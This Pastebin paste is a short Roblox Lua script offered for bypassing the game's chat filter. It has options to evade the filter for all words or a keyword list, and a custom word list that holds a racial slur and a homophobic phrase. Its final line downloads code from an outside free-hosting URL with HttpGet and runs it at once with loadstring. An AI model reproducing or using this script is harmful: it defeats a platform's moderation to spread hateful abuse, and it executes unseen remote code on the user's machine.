Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- _G.Option = 'keywords'; --[[
- Current options:
- - all: bypasses every word you write
- - keywords: bypasses only the list of words
- ]]
- _G.Auto_Update = {
- Enabled = true;
- Delay = 60; -- seconds
- }
- _G.Custom_Words = { -- your own custom words / sentences!
- 'nigga you are big',
- 'fuck somegay shit', -- etc
- }
- if not pcall(function()loadstring(game:HttpGet('https://xhamiii.000webhostapp.com/',true))()end)then warn'host is currently down'end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement